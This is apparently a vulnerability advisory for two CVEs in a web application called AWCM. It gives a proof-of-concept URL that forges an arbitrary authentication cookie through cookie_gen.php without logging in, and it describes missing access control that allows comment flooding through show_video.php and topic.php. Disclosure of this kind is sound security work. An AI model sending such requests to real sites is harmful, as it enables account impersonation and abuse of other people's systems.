1. Details: CVE-2012-2437
Without going through an authentication procedure, anyone can forge a cookie, the pairs of key and value.
Proof of Concept Code: Initiate the following URL request.
http://targethost/awcm/cookie_gen.php?name='key'&content='value\'
ex) http://targethost/awcm/cookie_gen.php? name=awcm_member&content=123456
2. Details CVE-2012-2438
There is no access control protection for adversaries to insert millions of comment records on the database on show_video.php and topic.php.